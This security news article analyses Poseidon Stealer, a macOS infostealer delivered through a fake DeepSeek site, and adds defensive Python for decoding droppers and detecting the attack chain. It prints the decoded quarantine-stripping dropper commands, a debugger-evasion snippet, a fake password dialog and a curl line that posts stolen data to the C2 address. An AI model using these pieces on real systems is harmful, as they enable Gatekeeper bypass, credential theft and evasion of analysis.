Tuesday, May 6, 2025

Poseidon Stealer Targets Mac Users via Fake DeepSeek Website


Cybersecurity researchers have uncovered a malware campaign targeting macOS users through a fraudulent copy of the DeepSeek.ai website.

Dubbed "Poseidon Stealer," this information-stealing malware combines anti-analysis techniques with a Terminal-based infection vector that sidesteps the Gatekeeper tightening in recent macOS releases, marking a notable escalation in macOS-focused threats.

Infection Vector and Social Engineering Tactics

The attack begins with malvertising campaigns redirecting users to deepseek.exploreio[.]net, a near-perfect replica of the legitimate DeepSeek.ai platform.

[Figure: Fake DeepSeek site]

Unsuspecting victims who click the "Start Now" button are served a malicious disk image whose file name follows the pattern DeepSeek_v.[0-9].[0-9]{2}.dmg (a version-number-style name), hosted on manyanshe[.]com.

[Figure: Alternate payload delivery via Terminal command]

Upon mounting the DMG, users are shown instructions to drag a file labeled "DeepSeek.file" into Terminal and press Return to "install" the application.

Dragging a file into Terminal pastes its path at the prompt, so the shell interprets the file as a script. The payload is therefore never launched as an app bundle through Finder, the path on which macOS Sequoia tightened Gatekeeper (Sequoia removed the Control-click "Open" override that previously let users run unsigned applications), and the script goes on to strip the quarantine attribute from the real binary before launching it.

eSentire analysts note this Terminal-based execution method represents an emerging trend among macOS threat actors: “The shift towards command-line interface abuse reflects adversaries’ adaptation to tightened security controls in recent Apple updates”.

[Figure: Anti-debug via ptrace()]

Technical Analysis of Payload Execution

The shell script (DeepSeek.file) employs multi-stage Base64 encoding to obscure its malicious intent. When decoded, the script performs:

  cp "/Volumes/DeepSeek/.DeepSeek" "/tmp/.DeepSeek"
  xattr -c "/tmp/.DeepSeek"
  chmod +x "/tmp/.DeepSeek"
  /tmp/.DeepSeek

This sequence copies the hidden malware binary (.DeepSeek) from the mounted image to a temporary directory, clears all extended attributes with xattr -c (including com.apple.quarantine, the flag Gatekeeper keys on), marks the copy executable, and launches it. Clearing quarantine is the actual Gatekeeper bypass: a binary without the quarantine flag is not assessed when it runs. A quick check on a suspect file is xattr -p com.apple.quarantine <path>, which prints the quarantine record on a normally downloaded file and fails with "No such xattr" once the flag has been stripped.
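As an added example (not code from the article, eSentire, or the malware), the following Python helper peels nested Base64 layers of a dropper of the DeepSeek.file kind and lists the paths it strips quarantine from. The two-layer sample dropper is constructed here from the four commands above; the 40-character Base64 threshold and the echo | base64 -d | sh wrapper shape are assumptions about how such droppers are built.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Long runs of Base64 alphabet characters, as they appear in droppers of the
# form `echo "<blob>" | base64 -d | sh`. The 40-character floor is an assumption
# chosen so that ordinary words and short paths are not mistaken for blobs.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Paths passed to `xattr -c` or `xattr -d com.apple.quarantine`, i.e. files whose
# quarantine flag is removed so Gatekeeper will not assess them.
QUARANTINE_STRIP = re.compile(
    r'xattr\s+(?:-c|-d\s+com\.apple\.quarantine)\s+"?([^"\s]+)"?'
)


def _try_decode(token: str) -> Optional[str]:
    """Decode one Base64 token to text, or return None if it is not Base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def peel_base64_layers(script: str, max_layers: int = 10) -> Tuple[str, int]:
    """Repeatedly replace the script with its largest decodable Base64 blob.

    Returns (innermost_plaintext, layers_removed). Stops when no blob decodes,
    so a plain script comes back unchanged with 0 layers."""
    current, layers = script, 0
    while layers < max_layers:
        decoded = None
        for token in sorted(B64_TOKEN.findall(current), key=len, reverse=True):
            decoded = _try_decode(token)
            if decoded is not None:
                break
        if decoded is None:
            break
        current, layers = decoded, layers + 1
    return current, layers


def quarantine_strips(script: str) -> List[str]:
    """List the paths a (decoded) script removes the quarantine attribute from."""
    return QUARANTINE_STRIP.findall(script)


# Constructed sample: the four commands from the article, wrapped in two
# Base64 layers the way a dropper would wrap them.
INNER_SCRIPT = (
    'cp "/Volumes/DeepSeek/.DeepSeek" "/tmp/.DeepSeek"\n'
    'xattr -c "/tmp/.DeepSeek"\n'
    'chmod +x "/tmp/.DeepSeek"\n'
    '/tmp/.DeepSeek\n'
)


def _wrap(payload: str) -> str:
    blob = base64.b64encode(payload.encode()).decode()
    return f'echo "{blob}" | base64 -d | sh\n'


SAMPLE_DROPPER = _wrap(_wrap(INNER_SCRIPT))

if __name__ == "__main__":
    plaintext, n = peel_base64_layers(SAMPLE_DROPPER)
    print(f"removed {n} Base64 layer(s); quarantine stripped from: {quarantine_strips(plaintext)}")
    print(plaintext)
```

The helper decodes statically, so it never executes the dropper; run it on the DeepSeek.file text itself rather than on a mounted image, and expect to adjust B64_TOKEN if a sample splits its blob across lines or uses a URL-safe alphabet.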

The stealer incorporates multiple anti-debugging measures, including:

  1. PT_DENY_ATTACH via ptrace() to block debugger attachment
  2. sysctl() process-tracing checks that read the process's own kinfo_proc record and test the P_TRACED flag
  3. Username blocklisting aimed at researchers' machines ("maria", "jackiemac", etc.)

The P_TRACED check follows the pattern Apple documents for sysctl(): query KERN_PROC for the current PID and exit if the kernel reports the process as traced:

  // needs <sys/types.h>, <sys/sysctl.h>, <unistd.h>, <stdlib.h>
  struct kinfo_proc info; size_t size = sizeof(info);
  int mib[4] = { CTL_KERN, KERN_PROC, KERN_PROC_PID, getpid() };
  sysctl(mib, 4, &info, &size, NULL, 0);
  if ((info.kp_proc.p_flag & P_TRACED) != 0) {   // a debugger is attached
      exit(1);
  }

Data Exfiltration Capabilities

Poseidon exhibits comprehensive data harvesting, targeting:

  • Browser Data: cookies, saved passwords and credit card data from Chrome and Firefox profiles
  • Cryptocurrency Wallets: wallet files from Ledger Live, Trezor Suite and Electrum
  • Documents: TXT, PDF and DOCX files from Desktop and Documents
  • Keychain: a full copy of the user's login keychain, ~/Library/Keychains/login.keychain-db

The stealer also shows a deceptive password prompt via AppleScript (osascript) and checks the entered password before continuing with collection. The prompt is not cosmetic: the login keychain copy is encrypted with the user's login password, so the stolen password is what makes the exported keychain usable off the machine. The "with hidden answer" clause masks the input so it looks like a system password field:

  display dialog "macOS needs your password to continue..." default answer "" with hidden answer

[Figure: Password dialog]

All exfiltrated data gets compressed and transferred via cURL to 82.115.223[.]9/contact using POST requests. 

[Figure: Harvested files ready for exfil]

Security teams analyzing intercepted payloads observed structured archive formats containing separate directories for browser data, financial documents, and system metadata.

Mitigation Strategies

Organizations should implement:

  1. User education: no legitimate installer asks the user to drag a file into Terminal; treat such instructions as a red flag
  2. Endpoint detection rules for osascript execution chains, in particular a "display dialog ... with hidden answer" prompt spawned by a process running from /tmp or a mounted disk image, and for xattr -c or xattr -d com.apple.quarantine followed by execution of the same path
  3. Network filtering for connections to the identified C2 IP (82.115.223[.]9)
  4. Regular audits of browser extensions and cryptocurrency wallet applications
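To make the detection items above concrete, here is an added Python example (not from the article or any vendor product) that applies three rules to constructed process-execution events modelled on the chain described in this article: quarantine stripped and then executed, a hidden-answer osascript password prompt from a suspicious parent, and curl to the listed C2 address. The event field names (pid, ppid, exe, cmd) and the sample events are assumptions; map them from your EDR's process-exec telemetry.

```python
import re
import shlex
from typing import Dict, List, Tuple

# Network indicator from the article (defanged there as 82.115.223[.]9).
C2_INDICATORS = {"82.115.223.9"}

# A password dialog spawned by something running from a mounted image or /tmp
# is far more suspicious than one spawned by an installed application.
SUSPICIOUS_PARENT_DIRS = ("/tmp/", "/private/tmp/", "/Volumes/")

QUARANTINE_STRIP = re.compile(r"^xattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b")

Event = Dict[str, object]
Alert = Tuple[str, int]


def detect(events: List[Event]) -> List[Alert]:
    """Run three rules over process-execution events (assumed chronological).

    Rule 1: a binary is executed after `xattr -c`/`-d com.apple.quarantine` was
            run on its path (quarantine stripped, then launched).
    Rule 2: osascript shows a `display dialog ... with hidden answer` password
            prompt and its parent runs from /tmp or a mounted volume.
    Rule 3: curl is invoked against a known C2 indicator.
    Returns (rule_name, pid) pairs."""
    by_pid = {e["pid"]: e for e in events}
    stripped: Dict[str, int] = {}  # path -> pid of the xattr call
    alerts: List[Alert] = []
    for e in events:
        exe, cmd, pid = str(e["exe"]), str(e["cmd"]), int(e["pid"])  # type: ignore[arg-type]
        if exe.endswith("/xattr") and QUARANTINE_STRIP.match(cmd):
            stripped[shlex.split(cmd)[-1]] = pid
        if exe in stripped:
            alerts.append(("quarantine_strip_then_exec", pid))
        if exe.endswith("/osascript") and "display dialog" in cmd and "hidden answer" in cmd:
            parent = by_pid.get(e["ppid"])
            if parent and str(parent["exe"]).startswith(SUSPICIOUS_PARENT_DIRS):
                alerts.append(("hidden_answer_prompt", pid))
        if exe.endswith("/curl") and any(ioc in cmd for ioc in C2_INDICATORS):
            alerts.append(("c2_contact", pid))
    return alerts


# Constructed sample telemetry modelled on the chain in the article.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 501, "ppid": 1, "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "cmd": "Terminal"},
    {"pid": 502, "ppid": 501, "exe": "/bin/sh", "cmd": "sh /Volumes/DeepSeek/DeepSeek.file"},
    {"pid": 503, "ppid": 502, "exe": "/usr/bin/xattr", "cmd": 'xattr -c "/tmp/.DeepSeek"'},
    {"pid": 504, "ppid": 502, "exe": "/bin/chmod", "cmd": 'chmod +x "/tmp/.DeepSeek"'},
    {"pid": 505, "ppid": 502, "exe": "/tmp/.DeepSeek", "cmd": "/tmp/.DeepSeek"},
    {"pid": 506, "ppid": 505, "exe": "/usr/bin/osascript",
     "cmd": "osascript -e 'display dialog \"macOS needs your password to continue...\" "
            "default answer \"\" with hidden answer'"},
    {"pid": 507, "ppid": 505, "exe": "/usr/bin/curl",
     "cmd": "curl -X POST -F file=@/tmp/out.zip http://82.115.223.9/contact"},
    # Benign: a build script's notification, no hidden-answer prompt.
    {"pid": 600, "ppid": 1, "exe": "/usr/bin/osascript",
     "cmd": "osascript -e 'display notification \"Build finished\"'"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 1 is the one worth keeping even after the C2 address changes: legitimate software has little reason to clear quarantine on a file and immediately execute it, whereas the IP in rule 3 is disposable.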

The emergence of macOS-specific malware-as-a-service offerings like Poseidon Stealer highlights the growing profitability of attacks on the Apple ecosystem.

With threat actors investing in advanced macOS reverse engineering capabilities, security teams must prioritize monitoring unconventional execution patterns even on traditionally “secure” platforms.


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
